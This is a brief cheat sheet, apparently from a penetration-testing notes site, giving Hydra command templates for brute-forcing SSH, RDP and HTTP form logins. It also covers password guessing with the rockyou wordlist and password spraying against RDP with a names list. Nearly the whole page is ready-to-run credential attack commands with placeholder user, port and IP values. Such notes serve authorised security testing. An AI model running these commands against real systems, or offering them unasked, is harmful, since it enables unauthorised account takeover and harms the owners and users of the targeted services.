π²Brute Force
Hydra
Use of Hydra
Variables as $USER$, $PORT$ and $IP$ should be changed.
SSH or RDP Protocols
hydra -l $USER$ -P $PASSWORD$ -s $PORT$ ssh://$IP$hydra -l $USER$ -P $PASSWORD$ -s $PORT$ rdp://$IP$HTTP Protocol
hydra -l $USER$ -P /usr/share/wordlists/rockyou.txt $IP$ http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"Password Guessing
hydra -l $USER$ -P /usr/share/wordlists/rockyou.txt -s $PORT$ ssh://$IP$Password Spraying
hydra -L /usr/share/wordlists/dirb/others/names.txt -p $PASSWORD$ rdp://$IP$Last updated